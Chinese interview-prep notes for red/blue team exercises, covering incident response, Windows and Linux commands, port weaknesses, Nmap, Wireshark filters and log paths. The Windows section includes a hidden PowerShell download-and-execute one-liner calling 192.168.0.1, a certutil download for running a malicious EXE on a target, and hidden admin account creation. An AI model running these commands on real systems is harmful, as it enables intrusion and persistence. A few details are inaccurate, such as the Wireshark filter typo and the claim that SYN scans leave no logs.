hvv常见面试题2
11.应急响应流程
准备阶段
和客户确认事件背景、相关负责人联系方式、确定参与此次应急响应人员、根据客户描述,初步判定事件响应策略,携带应急响应工具包前往客户现场。
检测阶段
检测阶段确认入侵事件是否发生,如真发生了入侵事件,评估造成的危害(比如说判断是信息泄露还是被写码了)、范围以及发展的速度,事件会不会进一步升级
抑制阶段
本阶段主要任务是通过事件分析查明事件危害的方式,并且给出清除危害的解决方案 系统基本信息、网络排查、进程排查、注册表排查、计划任务排查、服务排查、关键目录排查、用户组排查、事件日志排查、webshell 排查、中间件日志排查、安全设备日志排查
恢复阶段
把受影响系统、设备、软件和应用服务还原到正常的工作状态 常见手段:系统重装、补丁加固、网络恢复、密码重置、木马清除等。
跟踪阶段
调查事件原因,输出应急响应报告,提供安全建议、加强安全教育、避免同类事件
应急相应一图流
12.Windows 基础命令
type 显示文本内容 type 1.txt
dir 显示当前目录内容
dir/s/b 查询文件 返回绝对路径,例如 dir/s/b d:\a.php 查询D盘中a.php文件返回绝对路径
dir c:\ /s /b *.txt 查询c盘中txt文件,并返回绝对路径
/b 显示文件夹或文件的名字
/s 显示指定目录和所有子目录中的文件
* 是通配符,可以代表任意字符串
del 删除文件
ipconfig 查看IP地址
ipconfig /all 查看所有ip配置信息
net user 查看用户
net user ad 查看用户权限 ad为用户名
net user username password /add username 和password为你要添加的账号和密码
net user username$ password /add 隐藏用户
net user username /del 删除 或者username$ 删除隐藏
net localgroup administrators username /add username为要添加管理员组别的用户
net localgroup administrators 查看所有用户包括隐藏
query user || qwinsta 查看管理员是否在线
tasklist /svc | find "Ter",假如 TermService 的 PID 是 1592。查找远程桌面端口
netstat -ano | find "1592",查看 TermService 使用的端口,如示例中的 3389
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.0.1/powershell.txt'))"
powershell 隐藏执行下载脚本
certutil.exe -urlcache -split -f “文件下载地址” d:\test.exe 将文件下载到d盘命名为test.exe
Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工具在目标计算机上执行恶意EXE文件
13.Linux 防火墙及应急处理
service iptables status # 查看防火墙状态
service iptables start #开启防火墙
service iptables stop #关闭防火墙
service iptables restart #重启防火墙
查看用户组
cat /etc/passwd #可以查看所有用户的列表
w #可以查看当前活跃的用户列表
cat /etc/group #查看用户组
groups #查看当前登录用户的组内成员
groups #test 查看test用户所在的组,以及组内成员
whoami #查看当前登录用户名
查看进程
其中, -A:显示所有进程 a:显示终端中包括其它用户的所有进程 x:显示无控制终端的进程
ps aux | less
ps -A
ps -e
查看非root运行的进程
ps -U root -u root -N
查看用户vivek运行的进程
ps -u vivek
#进程树
ps -ejH
ps axjf
#获得线程信息
ps -eLf
ps axms
#获得安全信息
ps -eo euser,ruser,suser,fuser,f,comm,label
ps axZ
ps -eM
Linux 端口查看
#lsof -i:端口号查看某个端口的占用情况
lsof -i:8000
更多lsof
lsof -i:8080:查看8080端口占用
lsof abc.txt:显示开启文件abc.txt的进程
lsof -c abc:显示abc进程现在打开的文件
lsof -c -p 1234:列出进程号为1234的进程所打开的文件
lsof -g gid:显示归属gid的进程情况
lsof +d /usr/local/:显示目录下被进程开启的文件
lsof +D /usr/local/:同上,但是会搜索目录下的目录,时间较长
lsof -d 4:显示使用fd为4的进程
lsof -i -U:显示所有打开的端口和UNIX domain文件
#netstat -tunlp 用于显示 tcp,udp 的端口和进程等相关情况。
netstat -tunlp | grep 端口号
netstat -ntlp #查看当前所有tcp端口
netstat -ntulp | grep 80 #查看所有80端口使用情况
netstat -ntulp | grep 3306 #查看所有3306端口使用情况
14.Vulhub
Vulhub 是一个基于 docker 和 docker-compose 的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏洞原理本身。
15.常见端口
21 ftp ftp的端口号20、21的区别一个是数据端口,一个是控制端口,控制端口一般为21
69 TFTP (简单文件传输协议)
22 SSH
23 Telnet
80 web
80-89 web
443 https SSL心脏滴血
445 SMB ms17-010永恒之蓝
873 Rsync未授权
1433 MSSQL
1521 Oracle 这玩应记不住?记不住?
3306 MySQL
3389 远程桌面
5432 PostgreSQL
5900 vnc 目前常用的协议有VNC/SPICE/RDP三种 、小巧,支持客户端和服务器端的直接拷贝粘贴,缺点:速度最慢
6379 redis未授权
7001,7002 WebLogic默认弱口令,反序列
8080 tomcat/WDCP主机管理系统,默认弱口令
8080,8089,9090 JBOSS
Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个,
默认端口是8080
在windows系统中:
1098、1099、4444、4445、8083端口在/jboss/server/default/conf/jboss-service.xml中
8080端口在/jboss/server/default/deploy/jboss-web.deployer/server.xml中
8093端口在/jboss/server/default/deploy/jms/uil2-service.xml中。
8000-9090 都是一些常见的web端口
27017,27018 Mongodb未授权访问
28017 mongodb统计页面
50070,50030 hadoop默认端口未授权访问
161 SNMP
389 LDAP
512,513,514 Rexec
1025,111 NFS
2082/2083 cpanel主机管理系统登陆 (国外用较多)
2222 DA虚拟主机管理系统登陆 (国外用较多)
2601,2604 zebra路由,默认密码zebra
3128 squid代理默认端口,如果没设置口令很可能就直接漫游内网了
3312/3311 kangle主机管理系统登陆
4440 rundeck 参考WooYun: 借用新浪某服务成功漫游新浪内网
5984 CouchDB http://xxx:5984/_utils/
6082 varnish 参考WooYun: Varnish HTTP accelerator CLI 未授权访问易导致网站被直接篡改或者作为代理进入内网
7778 Kloxo主机控制面板登录
8083 Vestacp主机管理系统 (国外用较多)
8649 ganglia
8888 amh/LuManager 主机管理系统默认端口
9200,9300 elasticsearch 参考WooYun: 多玩某服务器ElasticSearch命令执行漏洞
10000 Virtualmin/Webmin 服务器虚拟主机管理系统
11211 memcache未授权访问
50000 SAP命令执行
16.三次握手与四次挥手
背景:TCP 位于传输层,作用是提供可靠的字节流服务,为了准确无误地将数据送达目的地,TCP 协议采纳三次握手四次挥手策略
三次握手(three-way handshaking)
TCP 三次握手,其实就是 TCP 应用在发送数据前,通过 TCP 协议跟通信对方协商好连接信息,建立起 TCP 的连接关系
第一次握手:客户端发送 SYN 报文,并进入 SYN_SENT 状态,等待服务器的确认
第二次握手:服务器收到 SYN 报文,需要给客户端发送 ACK 确认报文,同时服务器也要向客户端发送一个 SYN 报文,所以也就是向客户端发送 SYN + ACK 报文,此时服务器进入 SYN_RCVD 状态
第三次握手:客户端收到 SYN + ACK 报文,向服务器发送确认包,客户端进入 ESTABLISHED 状态。待服务器收到客户端发送的 ACK 包也会进入 ESTABLISHED 状态,完成三次握手
四次挥手(Four-Way-Wavehand)
当我们的应用程序不需要数据通信了,就会发起断开 TCP 连接。建立一个连接需要三次握手,而终止一个连接需要经过四次挥手
第一次挥手:客户端发送一个 FIN,用来关闭客户端到服务端的数据传送,客户端进入 FIN_WAIT_1 状态
第二次挥手:服务端收到 FIN 后,发送一个 ACK 给客户端,确认序号为收到序号 +1(与 SYN 相同,一个 FIN 占用一个序号),服务端进入 CLOSE_WAIT 状态
第三次挥手:服务端发送一个 FIN,用来关闭服务端到 客户端的数据传送,服务端进入 LAST_ACK 状态
第四次挥手:客户端收到 FIN 后,客户端进入 TIME_WAIT 状态,接着发送一个 ACK 给服务端,确认序号为收到序号 +1,服务端进入 CLOSED 状态,完成四次挥手
17.Nmap 工具使用
Nmap 是主机扫描工具,他的图形化界面是 Zenmap,分布式框架为 Dnamp。 Nmap 可以完成以下任务: 主机探测、端口扫描、版本检测、系统检测 支持探测脚本的编写 Nmap 在实际中应用场合如下:
通过对设备或者防火墙的探测来审计它的安全性
探测目标主机所开放的端口
通过识别新的服务器审计网络的安全性
探测网络上的主机
#扫描基础指令
-sT TCP (全)连接扫描,准确但留下大量日志记录
-sS TCP SYN (半)扫描,速度较快,不会留下日志
-sN null 扫描,标志位全为 0,不适用 Windows
-sF FIN 扫描,标志位 FIN=1,不适用 Windows
-O 查看目标主机系统版本
-sV 探测服务版本
-A 全面扫描
#主机发现
-sL: List Scan 列表扫描,仅将指定的目标的IP列举出来,不进行主机发现。
-sn: Ping Scan 只进行主机发现,不进行端口扫描。
-Pn: 将所有指定的主机视作开启的,跳过主机发现的过程。
-PS/PA/PU/PY[portlist]: 使用TCPSYN/ACK或SCTP INIT/ECHO方式进行发现。
-PE/PP/PM: 使用ICMP echo, timestamp, and netmask 请求包发现主机。-PO[protocollist]: 使用IP协议包探测对方主机是否开启。
-n/-R: -n表示不进行DNS解析;-R表示总是进行DNS解析。
--dns-servers : 指定DNS服务器。
--system-dns: 指定使用系统的DNS服务器
--traceroute: 追踪每个路由节点 版本侦测的
#版本侦测
-sV: 指定让Nmap进行版本侦测
--version-intensity : 指定版本侦测强度(0-9),默认为7。数值越高,探测出的服务越准确,但是运行时间会比较长。
--version-light: 指定使用轻量侦测方式 (intensity 2)
--version-all: 尝试使用所有的probes进行侦测 (intensity 9)
18.Wireshark 简单的过滤规则
#源ip
ip.src==1.1.1.1
#目的ip
ip.dst==1.1.1.1
#过滤80端口
tcp.port==80
#源端口
tcp.srcport==80
#目的端
tcp.dstport==80
#协议过滤:直接输入协议名即可,如 http 协议
http
#http 模式过滤:过滤 get/post 包
httprequest.mothod=="GET/POST"
19.常见取证分析工具
wireshark(流量包)、xplico、volatility(内存取证)、fastlr collector、autopsy、dumolt、ftk lmager、foremost、scalpel、bulik_exetractor
20.常见日志文件位置
IIS
Windows Server 2003 iis6 日志路径:
C:\Windows\System32\LogFiles
Windows Server 2008 R2、2012、2016、2019 iis7 以上日志路径:
C:\inetpub\logs\LogFiles
Apache
Apache+Windows
D:\xampp\apache\logs\access.log
Apache+Linux
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/httpd/access.log
nginx
/usr/local/nginx/logs
常见格式内容
访问的主机 IP
请求时间
请求方法、请求的 URL、采用的协议
HTTP 状态码